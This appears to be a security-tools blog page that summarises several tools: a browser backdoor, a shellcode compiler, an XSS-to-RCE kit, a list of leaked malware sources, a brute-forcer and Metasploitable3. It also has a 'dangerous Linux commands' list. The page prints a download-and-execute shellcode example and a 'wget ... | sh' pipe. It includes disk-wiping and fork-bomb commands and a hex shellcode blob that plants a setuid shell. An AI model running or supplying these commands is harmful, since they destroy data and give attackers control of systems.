Backdoor C&C for Populars Browsers - Chromebackdoor

Chromebackdoor is a pentest tool, this tool use a MITB technique for generate a windows executable ".exe" after launch run a malicious extension or script on most popular browsers, and send all DOM datas on command and control.

VIDEO

• Install Text (V 3.0)
• Install Video (OLD)
• Binder guide
• Module guide
• Form grabber plugins
• Facebook MessengerSpy plugins
• Jabber Notifier/ Hide Panel
• Windows infection
• Rubber Ducky Payload

Require:

• pip install crxmake
• wine32

Let's go

python chromebackdoor.py

web browser infection

• pour rappel, infiltrer, surveiller, un système informatique sans autorisation est un délit
• reminder, infiltrate, monitor, computer system without authorization is a crime

Download Chromebackdoor

Read More

Shellcode C/C++ Compiler for Windows - ShellcodeCompiler

Shellcode Compiler is a program that compiles C/C++ style code into a small, position-independent and NULL-free shellcode for Windows. It is possible to call any Windows API function in a user-friendly way.

Shellcode Compiler takes as input a source file and it uses it's own compiler to interpret the code and generate an assembly file which is assembled with NASM ( http://www.nasm.us/ ).

Shellcode compiler was released at DefCamp security conference in Romania, November 2016.

Command line options

    -h (--help)      : Show this help message
    -v (--verbose)   : Print detailed output
    -t (--test)      : Test (execute) generated shellcode
    -r (--read)      : Read source code file
    -o (--output)    : Output file of the generated binary shellcode
    -a (--assembbly) : Output file of the generated assembly code

Source code example

    function URLDownloadToFileA("urlmon.dll");
    function WinExec("kernel32.dll");
    function ExitProcess("kernel32.dll");

    URLDownloadToFileA(0,"https://site.com/bk.exe","bk.exe",0,0);
    WinExec("bk.exe",0);
    ExitProcess(0);

Invocation example

    ShellcodeCompiler.exe -r Source.txt -o Shellcode.bin -a Assembly.asm

Limitations

1. It is not possible to use the return value of an API call
2. It is not possible to use pointers or buffers
3. It is not possible to declare variables

All these limitations will be fixed as soon as possible. However, many other limitations will exist. This is an Alpha version. Please report any bugs or suggestions.

Download ShellcodeCompiler

Read More

iOS App Security Assessment Tool - idb

idb is a tool to simplify some common tasks for iOS app security assessments and research. Please see the Documentation for a more detailed summary of each function.

Features

• Assessment Setup
  • SSH port forwarding
  • Installation of helper utilities
• App Information
  • Bundle information
  • Registered URL Schemes
  • Platform and SDK Versions
  • Data folder location
  • Entitlements
• Data Storage
  • List plist files and data protection class
  • List sqlite files and data protection class
  • List Cache.db files and data protection class
  • Full app file system browser
    • Browse files
    • Download/view files
    • Check data protection
    • Rsync folders and keep git revisions
  • Dump iOS keychain
• Binary Analysis
  • Check for encryption
  • Check for protections (ASLR/PIE, DEP, ARC)
  • List shared libraries
  • Extract strings in app binary
  • Dump class and method signatures
• IPC
  • List URL handlers
  • Invoke and fuzz URL handlers
  • Monitor the iOS pasteboardA
• Other Tools
• Check for iOS backgrounding screenshot
• Install certificates
• Edit /etc/hosts file

Download idb

Read More

Caffeinated Packet Analyzer - Dripcap

Caffeinated packet analyzer. Dripcap is a modern packet analyzer based on Electron.

Getting Started

• Download & Install
• Capturing
• Packet Filtering
• Display Filter Syntax

Advanced Usage

• Build from source
• Import Pcap Files
• Install Add-on Packages

Create & Publish Your Package

• Create Theme Package
• Create Dissector Package
• Create UI Package
• Publish Package

Dissector Overview

• Dissection Process
• Namespace
• Create a Custom Dissector Class

API Reference

• UI Classes
• Builtin Dissector Classes

Download Dripcap

Read More

From XSS to RCE - XSSER

From XSS to RCE 2.5 - Black Hat Europe Arsenal 2016

Demo

• Version 2.0 - 2015: https://www.youtube.com/playlist?list=PLIjb28IYMQgqqqApoGRCZ_O40vP-eKsgf
• Version 2.5 - 2016: https://www.youtube.com/playlist?list=PLRic6PgcrsWGkgacL6WFnSQKVRZIoofRj

Requirements

• Python (2.7.*, version 2.7.11 was used for development and demo)
• Gnome
• Bash
• Msfconsole (accessible via environment variables)
• Netcat (nc)
• cURL (curl) [NEW]
• PyGame (apt-get install python-pygame) [NEW]

Payload Compatibility

• Chrome (14 Nov 2015) - This should still work.
• Firefox (04 Nov 2016) - Tested live at Black Hat Arsenal 2016

WordPress Lab

• WordPress http://wordpress.org/
• Better WP Security 3.5.3 http://www.exploit-db.com/wp-content/themes/exploit/applications/c6d6beb3c11bc58856e15218d512b851-better-wp-security.3.5.3.zip
• Optional: WPSEO https://yoast.com/wordpress/plugins/seo/

WordPress Exploit

• http://www.exploit-db.com/exploits/27290/

Joomla Lab

• Joomla https://www.joomla.org/
• SecurityCheck 2.8.9 https://www.exploit-db.com/apps/543ccd00b06d24be139d7e18212a0916-com_securitycheck_j3x-2.8.9.zip

Joomla Exploit

• https://www.exploit-db.com/exploits/39879/

Directories

• Audio: Contains remixed audio notifications.
• Exploits: Contains DirtyCow (DCOW) privilege escalation exploits.
• Joomla_Backdoor: Contains a sample Joomla extension backdoor which can be uploaded as an administrator and subsequently used to execute arbitrary commands on the system with system($_GET['c']).
• Payloads/javascript: Contains the JavaScript payloads. Contains a new "add new admin" payload for Joomla.
• Shells: Contains the PHP shells to inject, including a slightly modified version of pentestmonkey's shell that connects back via wget.

Developed By

• Hans-Michael Varbaek
• Sense of Security

Credits

• MaXe / InterN0T

Download XSSER

Read More

Collections of Malware source code - Leaked

This is leaked source code of Malwares.

Obs, I am not responsible for your actions

Source from:

http://www.malwaretech.com/p/sources.html Dexter v2 (Point of Sales Trojan) Rovnix (Bootkit) Carberp (Banking Trojan) Tinba (Tiny ASM Banking Trojan) Zeus (Banking Trojan) KINS (Banking Trojan) Dendroid (Android Trojan) Grum (Spam Bot) Pony 2.0 (Stealer) Alina Spark (Point of Sales Trojan) RIG Front-end (Exploit Kit)

Download Malware Source Code (OFF)

Read More

Collaborative Penetration Test and Vulnerability Management Platform - Faraday v2.2

Faraday is the Integrated Multiuser Risk Environment you were looking for! It maps and leverages all the knowledge you generate in real time, letting you track and understand your audits. Our dashboard for CISOs and managers uncovers the impact and risk being assessed by the audit in real-time without the need for a single email. Developed with a specialized set of functionalities that help users improve their own work, the main purpose is to re-use the available tools in the community taking advantage of them in a collaborative way!

This release features a brand new library to connect with Faraday Server!

Managing vulnerabilities is now easier in Faraday!

Status and creator fields

A simple change can go a long way - we added two new ways of classifying issues stored in Faraday.

With the new update it is now possible to check the status of an issue - this could be opened, closed, re-opened or the risk is accepted.

If you set a vulnerability status as closed and later on when you re-scan the target the same issue is found again, the status will automatically change into re-opened allowing you to have a more granular view of the results of your scans. This is perfect for doing remediation retests, helping you to quickly understand what is still vulnerable.

Also, issues created by a specific tool, can now be filtered and sorted out. A great way to see where are the sources of information used during an engagement.

For example, as we can see in the following screenshots, we have three different issues that are closed [1]. After we import a Nessus scan the issues are marked as re-opened [2], indicating that the vulnerability is still present in the last scan.

1. Closed issues

2. Re-opened by Nessus scan import

Corporate Changes:

• Added a message to configure the Webshell - added a descriptive message for users who don’t have the Webshell properly configured

Webshell configuration message

Changes:

• New library to connect with Faraday Server 
• Fixed Fplugin, now it uses the new library to communicate with the Server 
• New fields for Vulnerabilities: plugin creator and status
• Refactor in Faraday Core and GTK Client 
• Bug fixing in Faraday Client and Server 

• News boxes example in the WEB UI
• New plugins: Dirb, Netdiscover, FruityWifi, Sentinel 
• Improvements on the WPscan plugin 
• Fixed Licenses search - there was a bug that disabled the option to search for licenses, now it is fixed and full-text search is enabled in the Licenses component

Licenses search

• Refactor Licenses module to be compatible with JS Strict Mode - in our efforts to improve our existing codebase for the WEB UI we refactored this component in order to make it run using Strict Mode in JavaScript

https://www.faradaysec.com
https://github.com/infobyte/faraday
https://twitter.com/faradaysec
https://forum.faradaysec.com/

Download Faraday

Read More

A Single File Bruteforcer Supports Multi-Protocol - F-Scrack

F-Scrack is a single file bruteforcer supports multi-protocol, no extra library requires except python standard library, which is ideal for a quick test.

Currently support protocol: FTP, MySQL, MSSQL，MongoDB，Redis，Telnet，Elasticsearch，PostgreSQL.

Compatible with OSX, Linux, Windows, Python 2.6+.

Usage
Options:

python F-Scrack.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10]

-h
Supports ip(192.168.1.1), ip range (192.168.1) (192.168.1.1-192.168.1.254), ip list (ip.ini) , maximum 65535 ips per scan.
-p
Ports you want to scan, use comma to separate multi ports. Eg 1433,3306,5432. 
Default scan ports(21,23,1433,3306,5432,6379,9200,11211,27017) if no ports specified.
-m
Number of threads. Default is 100.
-t
Seconds to wait before timeout.
-d
Dictionary file.
-n
Scan without ping scan(Live hosts detect).

Example:

python F-Scrack.py -h 10.111.1
python F-Scrack.py -h 192.168.1.1 -d pass.txt
python F-Scrack.py -h 10.111.1.1-10.111.2.254 -p 3306,5432 -m 200 -t 6
python F-Scrack.py -h ip.ini -n

Download F-Scrack

Read More

Get detailed information about a Twitter user activity - Tinfoleak v2.0

Are you interested in OSINT tools? Tinfoleak is the best OSINT tool for Twitter, and is open-source!
The new version includes a lot of new and improved features:

• Search by coordinates
• Geolocated users
• Tagged users
• User conversations
• Identification in other social networks
• More powerful and flexible search filter
• More detailed information on existing features
• … and many more information to generate intelligence!

Screenshots

Download Tinfoleak V2.0

Read More

Making Wills by Noam Chomsky

Making Wills, by Noam Chomsky in Requiem for the American Dream.
Create and spread consumerism in an ingenious and effective way, transforming human beings into consumers with little or no critical sense to keep them hostage to the consumer society, always under control.

By OffSec

Read More

Dangerous Linux Commands

rm -rf Command

The rm -rf command is one of the fastest way to delete a folder and its contents. But a little typo or ignorance may result into unrecoverable system damage. The some of options used with rm command are.

1. rm command in Linux is used to delete files.
2. rm -r command deletes the folder recursively, even the empty folder.
3. rm -f command removes ‘Read only File’ without asking.
4. rm -rf / : Force deletion of everything in root directory.
5. rm -rf * : Force deletion of everything in current directory/working directory.
6. rm -rf . : Force deletion of current folder and sub folders.

Hence, be careful when you are executing rm -rf command. To overcome accidental delete of file by ‘rm‘ command, create an alias of ‘rm‘ command as ‘rm -i‘ in “.bashrc” file, it will ask you to confirm every deletion.

:(){:|:&};: Command

This command is actually a fork bomb. It operates by defining a function called ‘:‘, which calls itself twice, once in the foreground and once in the background. It keeps on executing again and again till the system freezes.

:(){:|:&};:

command > /dev/sda

The above example writes the output of ‘command‘ on the block /dev/sda. The above command writes raw data and all the files on the block will be replaced with raw data, thus resulting in total loss of data on the block.

mv folder /dev/null

The mv command will move ‘folder‘ to /dev/null. In Linux /dev/null or null device is a special file that discards all the data written to it and reports that write operation succeed.

# mv /home/user/* /dev/null

The above command will move all the contents of a User directory to /dev/null, which literally means everything there was sent to blackhole (null).

wget http://malicious_source -O- | sh

This wget example will download a script from a malicious source and then execute it.

mkfs.ext3 /dev/sda

The example will format the ‘sda’. After execution of the above command your Hard Disk Drive would be marked as ‘NEW’, You would be left without any data and in unrecoverable system stage.

> file

This command is used to flush the content of file. If the above command is executed with a typo or ignorance like “> xt.conf” it would ‘flush’ a configuration file or any other system file.

^foo^bar

This command is used to edit the previous run command without the need of retyping the whole command again. This can really be really dangerous.

dd if=/dev/random of=/dev/sda

This dd will wipe out the block device sda and write random junk. Your system would be left at inconsistent and unrecoverable stage.

Hidden Command

The command bellow is nothing more than a rm -rf. Here, the command is hidden in in hex and the user may be fooled into running it. Running this code will wipe your root partition. This command here shows that the threat may be hidden and not normally detectable sometimes.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Read More

An Intentionally Vulnerable Machine for Exploit Testing - Metasploitable3

Metasploitable3 is a VM that is built from the ground up with a large amount of security vulnerabilities. It is intended to be used as a target for testing exploits with metasploit .

Metasploitable3 is released under a BSD-style license. See COPYING for more details.

Building Metasploitable 3

System Requirements:

• OS capable of running all of the required applications listed below
• VT-x/AMD-V Supported Processor recommended
• 65 GB Available space on drive
• 2.5 GB RAM

Requirements:

• Packer
• Vagrant
• Vagrant Reload Plugin
• VirtualBox 5.1.6
• Internet connection

NOTE: A bug was recently discovered in VirtualBox 5.1.8 that is breaking provisioning. More information here .

NOTE: A bug was recently discovered in Vagrant 1.8.7 on OSX that is breaking provisioning. More information here .

To build automatically:

1. Run the build_win2008.sh script if using bash, or build_win2008.ps1 if using Windows.
2. If the command completes successfully, run 'vagrant up'.
3. When this process completes, you should be able to open the VM within VirtualBox and login. The default credentials are U: vagrant and P: vagrant.

To build manually:

1. Clone this repo and navigate to the main directory.
2. Build the base VM image by running packer build windows_2008_r2.json . This will take a while the first time you run it since it has to download the OS installation ISO.
3. After the base Vagrant box is created you need to add it to your Vagrant environment. This can be done with the command vagrant box add windows_2008_r2_virtualbox.box --name=metasploitable3 .
4. Use vagrant plugin install vagrant-reload to install the reload vagrant provisioner if you haven't already.
5. To start the VM, run the command vagrant up . This will start up the VM and run all of the installation and configuration scripts necessary to set everything up. This takes about 10 minutes.

6. Once this process completes, you can open up the VM within VirtualBox and login. The default credentials are U: vagrant and P: vagrant.

Vulnerabilities

• See the wiki page

More Information

The wiki has a lot more detail and serves as the main source of documentation. Please check it out .

Acknowledgements

The Windows portion of this project was based off of GitHub user joefitzgerald's packer-windows project. The Packer templates, original Vagrantfile, and installation answer files were used as the base template and built upon for the needs of this project.

Download Metasploitable3

Read More